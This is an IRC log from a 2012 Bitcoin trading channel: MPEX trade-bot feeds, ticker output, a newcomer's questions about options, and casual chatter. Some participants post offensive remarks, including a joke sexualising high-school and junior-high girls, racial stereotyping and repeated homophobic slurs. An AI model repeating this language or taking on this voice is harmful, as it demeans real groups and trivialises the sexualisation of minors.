24 hour low: 11.55000, 24 hour high: 11.79000, 24 hour vwap: 11.66320 Oct 25 06:14:23 ;;bc,24hprc Oct 25 06:14:25 11.62 Oct 25 06:14:36 unrelatedly : is anything funnier than the fact that uk's chief justice lord is an honorable judge by the name judge ? Oct 25 06:14:36 pigeons: oh nice Oct 25 06:14:46 is that like major major? Oct 25 06:14:57 http://en.wikipedia.org/wiki/Major_Major_Major_Major Oct 25 06:15:13 ya but that's fictional Oct 25 06:16:33 also, this guy is actually igor judge baron judge lord chief justice & queen's counsel Oct 25 06:16:50 buffalo buffalo buffalo buffalo buffalo buffalo Oct 25 06:16:56 . Oct 25 06:17:15 biggie smalls biggie smalls biggie smalls Oct 25 06:17:46 the space between dick and and, and and and harry is too small Oct 25 06:19:36 http://www.youtube.com/watch?v=HwrotPF3Ak0 Oct 25 06:20:06 igor? Oct 25 06:20:51 https://bitcointalk.org/index.php?topic=67185.msg1210059#msg1210059 kinda interesting graphs actually Oct 25 06:20:52 that looks like a guy having fun Oct 25 06:20:56 via sgornick Oct 25 06:22:02 mircea_popescu: these are better http://bitcoinx.com/charts/ Oct 25 06:22:13 SupaDupa: I challenge you to act like an adult for 24 hours Oct 25 06:22:17 and they have the same sort of info Oct 25 06:22:31 :) Oct 25 06:22:34 challenge failed Oct 25 06:22:54 o hyes Oct 25 06:23:04 sorta like a tl;dr mpoe-pr summary service for the public ?! Oct 25 06:23:09 Anyone know how to find out your bitcoinmax balance? I pinged payb.tc but he isn't replying and his site is broke :< Oct 25 06:23:36 A North Korean army minister was reportedly executed with a mortar round for allegedly drinking and carousing during the official mourning period following leader Kim Jong-il's death. Oct 25 06:24:07 YOU WILL MOURN, or else. Oct 25 06:25:30 Chaang-Noi: maybe you can shed some light on ^ :P Oct 25 06:25:59 i dont know anything about n korea Oct 25 06:26:08 Chaang-Noi: above that :P Oct 25 06:26:25 [MPEX] [S.MPOE] 3400 @ 0.00043539 = 1.4803 BTC [+] Oct 25 06:26:37 You're welcome. Oct 25 06:26:37 Thanks for staying away from my services. Oct 25 06:26:37 I'm really trying hard to make this project completely different from all the other shit holes, like i.e. GLBSE used to be. Oct 25 06:26:38 about payb.tc or supadupa? Oct 25 06:26:48 apparently the girl left some scars in the adolescent imagination. Oct 25 06:26:49 Chaang-Noi: payb.tc Oct 25 06:26:54 you think glbse got better MP? Oct 25 06:27:25 i know nothing about payb.tc other than he is not wanting to work with the sec or the kill pirate mob Oct 25 06:27:28 executed via mortar? Oct 25 06:27:34 i think if you had payb.tc you now haz 0 btc Oct 25 06:27:42 just like all the other people who gave coin to pirate Oct 25 06:27:47 indeed Oct 25 06:27:58 supadupa perma banned! Oct 25 06:28:01 was just curious how much I lost, but he isn't responding to forum pm's and his sites login is broke Oct 25 06:28:02 :< Oct 25 06:28:26 great lol Oct 25 06:28:28 i dont think payb.tc will be back Oct 25 06:28:35 you have his real life docs right? Oct 25 06:28:52 just call him up Oct 25 06:29:01 I don't D: Oct 25 06:29:12 bah, who gives bitcoins to people they actually know? Oct 25 06:29:19 guess I will have to piece it together from my bitcoin wallet history Oct 25 06:30:06 /g 3 Oct 25 06:30:35 SupaDupa: Suggestion, if you want to repay your loans, why don't you just repay them in USD? I'm sure people would be willing to accept that, and you have it Oct 25 06:30:46 ^ Oct 25 06:31:02 lol i dont use paypal Oct 25 06:31:02 of COURSE people will accept CASH Oct 25 06:31:13 If someone doesn't accept cash, they are an IDIOT Oct 25 06:31:40 I accept cash. I just don't send goods until I have cash in hand. Oct 25 06:31:57 paypal isn't cash, maybe not everyone supa borrowed from even uses usd, the deal was for btc, maybe they want btc Oct 25 06:32:18 He can buy bitcoins with cash though Oct 25 06:33:09 he doesn't have cash, he has paypal Oct 25 06:33:12 [MPEX] [S.MPOE] 6346 @ 0.00043539 = 2.763 BTC [+] Oct 25 06:33:13 [MPEX] [S.MPOE] 41400 @ 0.00043546 = 18.028 BTC [+] Oct 25 06:33:15 [MPEX] [S.MPOE] 56400 @ 0.00043748 = 24.6739 BTC [+] Oct 25 06:33:16 [MPEX] [S.MPOE] 56241 @ 0.00043789 = 24.6274 BTC [+] Oct 25 06:33:17 [MPEX] [S.MPOE] 12626 @ 0.00043858 = 5.5375 BTC [+] Oct 25 06:33:17 Or better yet, he can pay a bitcoin seller with cash and the bitcoin seller sends bitcoins to the person that supa owes btc/money to Oct 25 06:33:18 [MPEX] [S.MPOE] 53038 @ 0.00043867 = 23.2662 BTC [+] Oct 25 06:33:18 so he can't change pp to btc ?! Oct 25 06:33:19 [MPEX] [S.MPOE] 15700 @ 0.00043885 = 6.8899 BTC [+] Oct 25 06:33:20 [MPEX] [S.MPOE] 23000 @ 0.00043903 = 10.0977 BTC [+] Oct 25 06:33:21 [MPEX] [S.MPOE] 43800 @ 0.00044 = 19.272 BTC [+] Oct 25 06:33:21 [MPEX] [S.MPOE] 30800 @ 0.00044037 = 13.5634 BTC [+] Oct 25 06:33:22 [MPEX] [S.MPOE] 9200 @ 0.00044043 = 4.052 BTC [+] Oct 25 06:33:23 [MPEX] [S.MPOE] 36400 @ 0.00044052 = 16.0349 BTC [+] Oct 25 06:33:24 [MPEX] [S.MPOE] 6780 @ 0.00044092 = 2.9894 BTC [+] Oct 25 06:33:25 [MPEX] [S.MPOE] 39900 @ 0.00044104 = 17.5975 BTC [+] Oct 25 06:33:26 [MPEX] [S.MPOE] 30500 @ 0.00044158 = 13.4682 BTC [+] Oct 25 06:33:27 [MPEX] [S.MPOE] 21900 @ 0.00044171 = 9.6734 BTC [+] Oct 25 06:33:28 o hallo Oct 25 06:33:28 [MPEX] [S.MPOE] 48489 @ 0.00044179 = 21.422 BTC [+] Oct 25 06:33:29 [MPEX] [S.MPOE] 11200 @ 0.00044191 = 4.9494 BTC [+] Oct 25 06:33:30 [MPEX] [S.MPOE] 11478 @ 0.0004424 = 5.0779 BTC [+] Oct 25 06:33:30 [MPEX] [S.MPOE] 26323 @ 0.00044242 = 11.6458 BTC [+] Oct 25 06:33:31 [MPEX] [S.MPOE] 54800 @ 0.00044246 = 24.2468 BTC [+] Oct 25 06:33:32 [MPEX] [S.MPOE] 17400 @ 0.00044248 = 7.6992 BTC [+] Oct 25 06:33:33 [MPEX] [S.MPOE] 15000 @ 0.00044251 = 6.6377 BTC [+] Oct 25 06:33:34 [MPEX] [S.MPOE] 25300 @ 0.00044258 = 11.1973 BTC [+] Oct 25 06:33:35 [MPEX] [S.MPOE] 31500 @ 0.00044275 = 13.9466 BTC [+] Oct 25 06:33:36 [MPEX] [S.MPOE] 4300 @ 0.00044277 = 1.9039 BTC [+] Oct 25 06:33:37 [MPEX] [S.MPOE] 53166 @ 0.00044286 = 23.5451 BTC [+] Oct 25 06:33:38 [MPEX] [S.MPOE] 23200 @ 0.00044291 = 10.2755 BTC [+] Oct 25 06:33:39 [MPEX] [S.MPOE] 41300 @ 0.00044286 = 18.2901 BTC [-] Oct 25 06:33:40 [MPEX] [S.MPOE] 53800 @ 0.00044332 = 23.8506 BTC [+] Oct 25 06:33:40 [MPEX] [S.MPOE] 1791 @ 0.00044379 = 0.7948 BTC [+] Oct 25 06:33:41 Time to sell! Oct 25 06:33:41 [MPEX] [S.MPOE] 2162 @ 0.00044389 = 0.9597 BTC [+] Oct 25 06:33:42 whats s.mpoe Oct 25 06:33:42 [MPEX] [S.MPOE] 21600 @ 0.00044487 = 9.6092 BTC [+] Oct 25 06:33:43 [MPEX] [S.MPOE] 32700 @ 0.00044497 = 14.5505 BTC [+] Oct 25 06:33:44 [MPEX] [S.MPOE] 40460 @ 0.00044568 = 18.0322 BTC [+] Oct 25 06:33:50 YES Oct 25 06:33:56 today has been a good day Oct 25 06:33:58 Ssateneth mpex + mpoe Oct 25 06:34:04 no idea what that is Oct 25 06:34:17 mpex is the btc stock exchange Oct 25 06:34:19 mpoe is the options bot. Oct 25 06:34:23 lolwat? Oct 25 06:34:28 you new ? Oct 25 06:34:30 Ssateneth: see topic Oct 25 06:35:03 I only joined here to see supa spamming Oct 25 06:35:08 https://bitcointalk.org/index.php?topic=118700.0 lol this is funnay Oct 25 06:35:29 o.o that's a first. you joined to see someone's spam ?! Oct 25 06:37:09 yeah lol Oct 25 06:37:11 shame the goatse stopped Oct 25 06:37:12 https://bitcointalk.org/index.php?topic=102010.msg1290358#msg1290358 ahahaha Oct 25 06:37:30 why do people stereotype so! Oct 25 06:38:57 cause the girl is mean Oct 25 06:39:00 lol Oct 25 06:39:17 she saw i was banned and has changed her ways:) Oct 25 06:39:58 good girls are always mean Oct 25 06:40:11 or awkward Oct 25 06:41:42 http://trilema.com/wp-content/uploads/2012/02/adolescenta-si-clitoris.gif - best pic of the day still Oct 25 06:41:45 well gif Oct 25 06:43:54 http://www.youtube.com/watch?v=hGOHE1zqEmY << this is pretty good too Oct 25 06:46:15 HAHAHAH Oct 25 06:47:09 did he ever get the toy car out? Oct 25 06:47:48 prolly Oct 25 06:58:50 [MPEX] [S.MPOE] 8273 @ 0.00043481 = 3.5972 BTC [-] Oct 25 07:19:45 SupaDupa ill trade btc for ltc or ppcoin Oct 25 07:19:58 scamcoin Oct 25 07:19:59 lol Oct 25 07:20:09 its better than paypal Oct 25 07:20:14 just trying to help a guy out Oct 25 07:23:30 lol Oct 25 07:24:43 [MPEX] [S.MPOE] 2800 @ 0.00043313 = 1.2128 BTC [-] Oct 25 07:38:08 [MPEX] [S.MPOE] 48527 @ 0.00043343 = 21.0331 BTC [+] Oct 25 07:38:09 [MPEX] [S.MPOE] 55900 @ 0.00044 = 24.596 BTC [+] Oct 25 07:38:10 [MPEX] [S.MPOE] 33800 @ 0.00044183 = 14.9339 BTC [+] Oct 25 07:38:11 [MPEX] [S.MPOE] 1000 @ 0.000445 = 0.445 BTC [+] Oct 25 07:38:12 [MPEX] [S.MPOE] 2822 @ 0.00044551 = 1.2572 BTC [+] Oct 25 07:38:13 [MPEX] [S.MPOE] 8840 @ 0.00044568 = 3.9398 BTC [+] Oct 25 07:38:15 [MPEX] [S.MPOE] 9000 @ 0.00044583 = 4.0125 BTC [+] Oct 25 07:38:16 [MPEX] [S.MPOE] 32900 @ 0.00044608 = 14.676 BTC [+] Oct 25 07:38:17 [MPEX] [S.MPOE] 16400 @ 0.00044637 = 7.3205 BTC [+] Oct 25 07:38:17 [MPEX] [S.MPOE] 18274 @ 0.00044695 = 8.1676 BTC [+] Oct 25 07:38:18 [MPEX] [S.MPOE] 34400 @ 0.00044763 = 15.3985 BTC [+] Oct 25 07:38:19 [MPEX] [S.MPOE] 22700 @ 0.00044784 = 10.166 BTC [+] Oct 25 07:38:20 [MPEX] [S.MPOE] 28094 @ 0.00044854 = 12.6013 BTC [+] Oct 25 07:38:21 [MPEX] [S.MPOE] 7343 @ 0.00044889 = 3.2962 BTC [+] Oct 25 08:04:06 [MPEX] [S.MPOE] 9378 @ 0.00044391 = 4.163 BTC [-] Oct 25 08:29:08 [MPEX] [S.MPOE] 33300 @ 0.0004375 = 14.5688 BTC [-] Oct 25 08:29:10 [MPEX] [S.MPOE] 12327 @ 0.00043718 = 5.3891 BTC [-] Oct 25 08:54:58 [MPEX] [S.MPOE] 1319 @ 0.00044391 = 0.5855 BTC [+] Oct 25 08:55:00 [MPEX] [S.MPOE] 15800 @ 0.00044742 = 7.0692 BTC [+] Oct 25 08:55:01 [MPEX] [S.MPOE] 1181 @ 0.00044859 = 0.5298 BTC [+] **** BEGIN LOGGING AT Thu Oct 25 10:45:14 2012 Oct 25 10:46:35 http://www.reddit.com/r/Bitcoin/comments/120zdj/gpg_contracts_vs_traditional_contracts_law/c6reke8 someone should point out the WOT to this guy Oct 25 11:01:10 [MPEX] [S.MPOE] 16873 @ 0.00043718 = 7.3765 BTC [-] Oct 25 11:01:11 [MPEX] [S.MPOE] 11227 @ 0.00043657 = 4.9014 BTC [-] Oct 25 11:26:31 [MPEX] [S.MPOE] 38600 @ 0.00044172 = 17.0504 BTC [+] Oct 25 11:26:33 [MPEX] [S.MPOE] 2938 @ 0.00044753 = 1.3148 BTC [+] Oct 25 11:27:41 mircea_popescu: you can do it Oct 25 11:27:50 do what ? Oct 25 11:32:20 o hey, gmaxwell "wants to reconsider my involvement with bitcoin." ?! best news of the fucking month. **** ENDING LOGGING AT Thu Oct 25 12:00:31 2012 **** BEGIN LOGGING AT Thu Oct 25 14:39:09 2012 Oct 25 14:51:18 [MPEX] [S.MPOE] 12227 @ 0.00044339 = 5.4213 BTC [-] Oct 25 15:16:27 [MPEX] [S.MPOE] 27329 @ 0.00044004 = 12.0259 BTC [-] Oct 25 15:31:35 Hmmm Oct 25 15:32:02 looks like its the right time to start doing puts @ 11 Oct 25 15:32:52 we'll probably see 7s again soon Oct 25 15:33:04 really? Oct 25 15:33:08 is the damage that deep? Oct 25 15:33:17 august/september were just bubbles? Oct 25 15:33:42 i wouldn't think about it as damage Oct 25 15:34:17 the market just doesn't have enough ppl acting on the price to keep it from having big swings Oct 25 15:41:30 [MPEX] [S.MPOE] 600 @ 0.00044576 = 0.2675 BTC [+] Oct 25 15:41:56 I feel like i should be makings puts @ 11 Oct 25 15:45:44 mircea_popescu: The article does not discuss "race". That's your own contribution. More generally, it's quite clear reading it that it follows a cultural rather than physical anthropology vein, and so your racial preoccupation is wholly misplaced. Oct 25 15:45:49 The article does not discuss inferiority, that is again your very own contribution. (It does discuss difference, obviously, but that's something else). Oct 25 15:45:52 He places the downfall of native american tribes on the fact that they were too "confused" to really understand ownership and thus got owned due to their backwardsness. The reason why most native tribes did not have free-hold land ownership treaties was because Oct 25 15:45:56 Makes no difference what follows that "because." Did you do your homework ? No you didn't because. F. Next time, do your homework. Oct 25 15:45:59 More generally, it is not okay to run around calling "retardedness" anything that doesn't jive with whatever little you groked of the ideological mishmash being presented as a viable alternative to reality by whatever second tier college you happen to be partying at. Oct 25 15:46:39 Did you right that haha? Oct 25 15:48:12 write* damn it's too early for me Oct 25 15:50:39 hm ? Oct 25 15:50:59 o hey, reddit. Oct 25 15:53:04 sorry for the wall of text Oct 25 15:53:12 prolly should just paste links Oct 25 15:53:12 one intelligent response Oct 25 15:53:16 I should Oct 25 15:53:20 It's early Oct 25 15:53:31 been working on writing my on 3d pipeline for class in python Oct 25 15:53:45 (head to keyboard) so much math Oct 25 15:54:11 scathing huh Oct 25 15:54:14 i like it Oct 25 15:54:23 the response? haha Oct 25 15:55:24 the last sentence made me chuckle Oct 25 15:55:46 cause we just discussed the "university students" a few hours ago Oct 25 15:58:35 mircea_popescu: question about options, when I purchase a put for this month as you said it's american style right? So basically I have until Oct 31st to exercise on the option's strike price? Oct 25 15:58:48 yes Oct 25 15:58:55 oct the 26th Oct 25 15:59:01 all options expire on the last firday of their month Oct 25 15:59:07 oh Oct 25 15:59:09 tomorrow then Oct 25 15:59:13 damn son Oct 25 15:59:21 this be a gamble ;-0 Oct 25 15:59:52 o ya, you can't even buy them anymore Oct 25 16:00:03 bot doesn't offer during last 24 hours Oct 25 16:00:21 oh heh Oct 25 16:00:25 well next week then Oct 25 16:00:37 hopefully it doesn't go below 11 right before new options are issued Oct 25 16:00:44 but thats what the N's are for right? Oct 25 16:00:50 T = this month N = next month? Oct 25 16:00:52 you can buy Ns, they expire november Oct 25 16:00:58 yea Oct 25 16:01:15 and they are "active" as soon as last month is over Oct 25 16:01:18 ?* Oct 25 16:03:44 no ? Oct 25 16:03:50 what do you mean by "active" Oct 25 16:04:20 when are we allowed to exercise on the option's strike price? Oct 25 16:04:37 sorry for asking n00b questions Oct 25 16:04:54 at any time up till their expiration Oct 25 16:07:13 [MPEX] [S.MPOE] 371 @ 0.00044081 = 0.1635 BTC [-] Oct 25 16:19:04 ;;ticker Oct 25 16:19:04 BTCUSD ticker | Best bid: 11.13001, Best ask: 11.15000, Bid-ask spread: 0.01999, Last trade: 11.15000, 24 hour volume: 49643.68215816, 24 hour low: 11.02500, 24 hour high: 11.71000, 24 hour vwap: 11.40163 Oct 25 16:29:35 it's plummeting Oct 25 16:29:47 Short Sell up in dis bitch no? Oct 25 16:30:07 You're going to be the BTC warren buffet one day. Oct 25 16:30:16 mircea_popescu Oct 25 16:30:30 [MPEX] [O.BTCUSD.P130T] 4 @ 0.14264076 = 0.5706 BTC [+] Oct 25 16:30:38 lol ok Oct 25 16:31:16 not saying that to butter you up, but you and smickles have ridiculous insight into the btc economy Oct 25 16:31:33 it's a shame more people just don't listen to you Oct 25 16:32:09 well, the advantage of this venue is the very btc Oct 25 16:32:14 it doesn't tend to stick with the silly. Oct 25 16:32:59 [MPEX] [O.BTCUSD.P110T] 10 @ 0.053896 = 0.539 BTC [+] Oct 25 16:33:06 is that someone exercising options Oct 25 16:33:07 ?* Oct 25 16:37:45 no ? Oct 25 16:38:11 just buying selling them? I thought it was too late to buy this month Oct 25 16:38:57 bot doesn't sell during last 24 hours. Oct 25 16:40:05 so those are people trading options? Oct 25 16:40:22 yea Oct 25 16:40:27 exercises aren't reported in the feed Oct 25 16:40:42 when you exercise and option you pay btc = to the usd price for the btc? Oct 25 16:40:59 btc strike price* Oct 25 16:41:21 hm ? Oct 25 16:41:42 could you go over a quick example like I'm 5 for exercising and option (particularly a put) Oct 25 16:41:50 (I'm sorry I'm a n00b) Oct 25 16:42:41 (strike - current) / current for puts Oct 25 16:42:47 (current - strike) / current for calls Oct 25 16:43:04 so taking O.BTCUSD.P110T : Oct 25 16:43:07 ;;ticker Oct 25 16:43:08 BTCUSD ticker | Best bid: 11.06003, Best ask: 11.10670, Bid-ask spread: 0.04667, Last trade: 11.06003, 24 hour volume: 52165.66011815, 24 hour low: 11.00000, 24 hour high: 11.71000, 24 hour vwap: 11.37971 Oct 25 16:43:26 well that's not itm Oct 25 16:43:26 that was deceivingly simple Oct 25 16:43:32 if it were a call : Oct 25 16:43:44 ( 11.37971 - 11) / 11.37971 Oct 25 16:45:53 So for calls when your purchase the option, the strike price has to be below the current price, and vice-versa for puts? (being issued from bot that is) Oct 25 16:46:02 you* not your Oct 25 16:50:27 well that's what an in the money option is Oct 25 16:50:48 think about it, it's little use to have the right to buy at 12 when the market price is 11 Oct 25 16:50:54 or to sell at 10. Oct 25 16:51:24 i see, thanks for clarifying :) Oct 25 16:51:45 I changed my business VP Oct 25 16:51:58 cause you were right (as always) Oct 25 16:52:12 btc is not for consumers Oct 25 16:59:30 [MPEX] [S.MPOE] 4429 @ 0.00043989 = 1.9483 BTC [-] Oct 25 17:25:56 [MPEX] [S.MPOE] 9600 @ 0.00043989 = 4.2229 BTC [-] Oct 25 17:29:54 15:52.11 ( thestringpuller ) btc is not for consumers Oct 25 17:30:11 whats the exact reasoning behind it Oct 25 17:43:38 A 20-year-old Brazilian student has sold her virginity in an online auction to a Japanese man named Natsu for £483,000 ($772,000). Oct 25 17:43:43 i'd list that... Oct 25 17:45:32 > japanese man Oct 25 17:45:36 you know Oct 25 17:45:39 I read this story Oct 25 17:45:41 like last week Oct 25 17:45:46 and the auction wasnt finished Oct 25 17:45:49 and I was like Oct 25 17:45:57 "sounds like something a japanese guy would bid for" Oct 25 17:46:02 i dunno what the fuck you'd have to think Oct 25 17:46:02 not sure if Im racist or accurate. Oct 25 17:46:15 you can spend 150k on a car, $500 on pills Oct 25 17:46:21 and get three chicks in both holes Oct 25 17:46:22 mircea_popescu: dude Oct 25 17:46:23 each night Oct 25 17:46:27 you have to go to HIGH SCHOOL Oct 25 17:46:35 allllll the virgin women you'd ever want Oct 25 17:46:35 more like junior high, but anyway Oct 25 17:46:40 and a bunch you wouldnt want Oct 25 17:46:53 and probably a few teachers that'd do it for you Oct 25 17:47:10 or you could go to like... hm. thailand, was it ? Oct 25 17:47:28 naw, ladyboys arent my thing Oct 25 17:47:46 http://www.theblaze.com/stories/cnn-scrubs-article-about-female-voting-study-womens-voting-patterns-vary-based-on-their-hormones/ Oct 25 17:47:47 ahaha Oct 25 17:47:54 cnn had a fit of pms Oct 25 17:48:04 mircea_popescu: why stop at two holes? Oct 25 17:48:40 what, make some ? Oct 25 17:48:54 oh, you clearly haven't seen the urethral sex videos Oct 25 17:48:59 I am disappoint Oct 25 17:49:45 im more of a sexual conservative like that Oct 25 17:50:13 I thought you were more pimpin than snoop dogg himself mircea_popescu Oct 25 17:50:29 in a sexually conservative sort of way Oct 25 17:50:51 what do girls want? Oct 25 17:50:57 age old question Oct 25 17:51:00 [MPEX] [S.MPOE] 16280 @ 0.00043989 = 7.1614 BTC [-] Oct 25 17:51:03 diiiscipline Oct 25 17:51:18 o rly? Oct 25 17:53:32 i hate vector algebra Oct 25 17:53:38 but it is a necessary evil Oct 25 17:56:10 nothing wrong with it Oct 25 17:57:06 if you have to do it by hand as if it's still 1812 then yea there is something wrong with hit Oct 25 17:57:31 who has to do vector algebra by hand Oct 25 17:58:25 depends if you're proving shit or calculating numbers :) Oct 25 17:58:39 ;;ticker Oct 25 17:58:40 BTCUSD ticker | Best bid: 10.93000, Best ask: 10.93023, Bid-ask spread: 0.00023, Last trade: 10.93000, 24 hour volume: 61721.37923365, 24 hour low: 10.84731, 24 hour high: 11.71000, 24 hour vwap: 11.30128 Oct 25 17:58:48 time to buy options Oct 25 17:59:14 i'm doing 3d math Oct 25 17:59:22 rasterizing a 3d scene "by hand" Oct 25 18:03:05 [MPEX] [O.BTCUSD.P110N] 4 @ 0.2426901 = 0.9708 BTC [+] Oct 25 18:03:21 lol Oct 25 18:28:53 [MPEX] [S.MPOE] 8500 @ 0.00043989 = 3.7391 BTC [-] Oct 25 18:29:02 http://talkweb.eu/openweb/1842 le lol Oct 25 18:29:12 facebook figures itself a sort of gubernmint Oct 25 18:54:03 [MPEX] [S.MPOE] 1696 @ 0.00043989 = 0.7461 BTC [-] Oct 25 18:54:04 [MPEX] [S.MPOE] 31704 @ 0.00043985 = 13.945 BTC [-] Oct 25 19:17:09 holy shit mircea_popescu Oct 25 19:17:17 that's frightening Oct 25 19:19:09 [MPEX] [S.MPOE] 5596 @ 0.00043985 = 2.4614 BTC [-] Oct 25 19:19:10 [MPEX] [S.MPOE] 4700 @ 0.00043753 = 2.0564 BTC [-] Oct 25 19:19:12 [MPEX] [S.MPOE] 8055 @ 0.00043657 = 3.5166 BTC [-] Oct 25 19:19:13 [MPEX] [S.MPOE] 35749 @ 0.00043655 = 15.6062 BTC [-] Oct 25 19:22:08 ;;ticker Oct 25 19:22:08 BTCUSD ticker | Best bid: 11.04001, Best ask: 11.08999, Bid-ask spread: 0.04998, Last trade: 11.09000, 24 hour volume: 65134.03095826, 24 hour low: 10.84731, 24 hour high: 11.71000, 24 hour vwap: 11.26946 Oct 25 19:39:10 hm ? Oct 25 19:44:22 [MPEX] [S.MPOE] 6224 @ 0.00043655 = 2.7171 BTC [-] Oct 25 20:09:34 [MPEX] [S.MPOE] 16100 @ 0.00043992 = 7.0827 BTC [+] Oct 25 20:34:40 [MPEX] [S.MPOE] 5427 @ 0.00043655 = 2.3692 BTC [-] Oct 25 20:34:42 [MPEX] [S.MPOE] 10373 @ 0.0004357 = 4.5195 BTC [-] Oct 25 20:58:57 ;;ticker Oct 25 20:58:57 BTCUSD ticker | Best bid: 11.05000, Best ask: 11.12740, Bid-ask spread: 0.07740, Last trade: 11.05000, 24 hour volume: 65695.61932853, 24 hour low: 10.84731, 24 hour high: 11.71000, 24 hour vwap: 11.25478 Oct 25 21:00:15 [MPEX] [S.MPOE] 10129 @ 0.00043992 = 4.4559 BTC [+] Oct 25 21:00:16 [MPEX] [S.MPOE] 2359 @ 0.00044033 = 1.0387 BTC [+] Oct 25 21:04:20 ;;ticker Oct 25 21:04:21 BTCUSD ticker | Best bid: 11.05000, Best ask: 11.05001, Bid-ask spread: 0.00001, Last trade: 11.05000, 24 hour volume: 65454.63059593, 24 hour low: 10.84731, 24 hour high: 11.71000, 24 hour vwap: 11.25302 Oct 25 21:04:24 ;;bc,24hprc Oct 25 21:04:25 11.22 Oct 25 21:11:22 [MPEX] [O.BTCUSD.P190T] 3 @ 0.69548485 = 2.0865 BTC [+] Oct 25 21:13:41 [MPEX] [O.BTCUSD.P110T] 3 @ 0.05192401 = 0.1558 BTC [-] Oct 25 21:38:54 [MPEX] [S.MPOE] 28427 @ 0.0004357 = 12.3856 BTC [-] Oct 25 21:38:55 [MPEX] [S.MPOE] 29073 @ 0.00043534 = 12.6566 BTC [-] Oct 25 22:04:59 [MPEX] [S.MPOE] 2868 @ 0.00043534 = 1.2486 BTC [-] Oct 25 22:05:01 [MPEX] [S.MPOE] 27100 @ 0.00043529 = 11.7964 BTC [-] Oct 25 22:05:02 [MPEX] [S.MPOE] 26232 @ 0.00043495 = 11.4096 BTC [-] Oct 25 22:14:58 thestringpuller, anything new? Oct 25 22:30:21 [MPEX] [S.MPOE] 42403 @ 0.00043623 = 18.4975 BTC [+] Oct 25 22:54:17 damn btc is stuck below 12 Oct 25 22:55:46 WTF is going on, ASIC makers still dumping huge numbers of coins to get USD to build their ASICs? Oct 25 22:56:19 [MPEX] [S.MPOE] 4000 @ 0.00043496 = 1.7398 BTC [-] Oct 25 22:56:20 [MPEX] [S.MPOE] 3800 @ 0.00043495 = 1.6528 BTC [-] Oct 25 22:56:38 that is the cnbc answer Oct 25 22:56:56 I thought the asic makers used bitpay or something to dump as soon as the purchase is made. Oct 25 22:57:15 ok change to bitpay still dumping ... Oct 25 23:00:08 [MPEX] [O.BTCUSD.P060N] 10 @ 0.052 = 0.52 BTC [+] Oct 25 23:00:10 ;;ticker Oct 25 23:00:11 BTCUSD ticker | Best bid: 10.66100, Best ask: 10.68991, Bid-ask spread: 0.02891, Last trade: 10.66100, 24 hour volume: 72170.32957297, 24 hour low: 10.66100, 24 hour high: 11.71000, 24 hour vwap: 11.18757 Oct 25 23:00:16 ooo Oct 25 23:00:43 i think i mostly had calls too. Oct 25 23:00:47 funny how that works out Oct 25 23:00:53 facebook has jumped the shark Oct 25 23:01:21 I've been considering deleting my profile but I think I'll just let it rot to avoid the drama Oct 25 23:03:53 i use fb for traking birthday of close friends Oct 25 23:03:57 i dont have anyone else really Oct 25 23:04:19 neither it has my real name on file Oct 25 23:06:08 lately I noticed it actually limits my social interaction Oct 25 23:08:01 also get sick of untagging myself from shit Oct 25 23:12:41 i really think this real name mystique is quite funny Oct 25 23:19:38 facebook was actually the first time my real name met the internet Oct 25 23:20:36 [MPEX] [S.DICE] 300 @ 0.00337 = 1.011 BTC [+] Oct 25 23:20:37 [MPEX] [S.DICE] 3000 @ 0.003375 = 10.125 BTC [+] Oct 25 23:20:39 [MPEX] [S.DICE] 200 @ 0.0034 = 0.68 BTC [+] Oct 25 23:21:14 [MPEX] [S.MPOE] 40346 @ 0.00043602 = 17.5917 BTC [+] Oct 25 23:21:15 [MPEX] [S.MPOE] 2297 @ 0.00043623 = 1.002 BTC [+] Oct 25 23:21:17 [MPEX] [S.MPOE] 1600 @ 0.00043832 = 0.7013 BTC [+] Oct 25 23:21:18 [MPEX] [S.MPOE] 17141 @ 0.00044033 = 7.5477 BTC [+] Oct 25 23:21:19 [MPEX] [S.MPOE] 17600 @ 0.00044576 = 7.8454 BTC [+] Oct 25 23:21:19 real names are awesome Oct 25 23:21:20 [MPEX] [S.MPOE] 5700 @ 0.00044733 = 2.5498 BTC [+] Oct 25 23:21:21 [MPEX] [S.MPOE] 32243 @ 0.00044889 = 14.4736 BTC [+] Oct 25 23:21:21 [MPEX] [S.MPOE] 50903 @ 0.00045028 = 22.9206 BTC [+] Oct 25 23:21:22 [MPEX] [S.MPOE] 25200 @ 0.00045144 = 11.3763 BTC [+] Oct 25 23:21:23 [MPEX] [S.MPOE] 2200 @ 0.00045148 = 0.9933 BTC [+] Oct 25 23:21:25 [MPEX] [S.MPOE] 29770 @ 0.00045172 = 13.4477 BTC [+] Oct 25 23:21:40 i was removing my name from the internet, so far doing good :-) Oct 25 23:21:45 [MPEX] [S.BVPS] 1200 @ 0.0032491 = 3.8989 BTC [-] Oct 25 23:21:56 lol john_smith Oct 25 23:22:45 mircea_popescu: what's the stereotypical most common Romanian name? Oct 25 23:23:12 and my name is quiet common :-) Oct 25 23:23:19 ion popescu Oct 25 23:23:24 why is premium so high on future puts? Oct 25 23:23:38 mircea_popescu: really? Oct 25 23:23:45 something like that. Oct 25 23:23:57 ion, gheorghe, in general saint's names are quite frequent Oct 25 23:24:20 ionescu is actually quite common last name too Oct 25 23:24:46 and your john smith reminds me of this one time we were awaiting the visit of one jon smith, expert in whatever from headquarters! Oct 25 23:24:54 guy turned out to be a stunning blonde. Oct 25 23:25:01 by the name of JON smith Oct 25 23:25:15 Joana! Oct 25 23:25:30 Joan Oct 25 23:25:58 lol Oct 25 23:26:07 it actually was jon Oct 25 23:28:00 not to mention the more-famous-than-me mircea monroe Oct 25 23:28:04 not robert? Oct 25 23:28:27 hm ? Oct 25 23:29:17 I tracked some of your countrymen to a cnc channel on undernet called #robert once Oct 25 23:29:48 robert kinda is a fag's name imo Oct 25 23:31:01 No, Rex is a fag name. Oct 25 23:31:16 res is ultra faggy Oct 25 23:31:19 mircea has fag potential. Oct 25 23:31:25 :P Oct 25 23:31:51 rex*, though robert is faggy too, I had a friend called robert Oct 25 23:31:51 Robert I see a Bob, I dont know any fag Bob's. Oct 25 23:31:55 rex is a dog's name Oct 25 23:32:08 all dogs are fags. Oct 25 23:32:09 he made me angry, then went to hospital Oct 25 23:33:04 mircea kinda has fag potential... which is why it shouldn't be entrusted in the wrong hands Oct 25 23:47:18 [MPEX] [S.MPOE] 4376 @ 0.00045172 = 1.9767 BTC [+] **** BEGIN LOGGING AT Fri Oct 26 05:07:30 2012 Oct 26 05:24:08 [MPEX] [S.MPOE] 25448 @ 0.00049132 = 12.5031 BTC [+] Oct 26 05:24:10 [MPEX] [S.MPOE] 1548 @ 0.00049188 = 0.7614 BTC [+] Oct 26 05:43:44 